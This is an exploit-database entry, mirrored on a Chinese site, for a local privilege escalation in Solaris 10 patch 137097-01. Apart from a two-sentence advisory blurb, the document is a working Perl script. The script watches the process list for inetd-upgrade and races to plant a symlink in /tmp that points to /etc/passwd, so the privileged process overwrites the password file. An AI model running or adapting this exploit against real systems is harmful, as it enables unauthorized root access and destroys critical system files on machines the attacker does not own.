Solaris 10 Patch 137097-01 – Symlink Privilege Escalation - 体验盒子

作者： Larry Cashdollar

日期： 2012-08-11

类别：

local

平台：

solaris

来源：https://www.exploit-db.com/exploits/20418/

source: https://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. 

Local attackers can exploit this issue to gain elevated privileges on affected computers.

#!/usr/bin/perl 
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) { 
print "Symlinking iconf_entries.$args[1] to$clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
 }
 }

}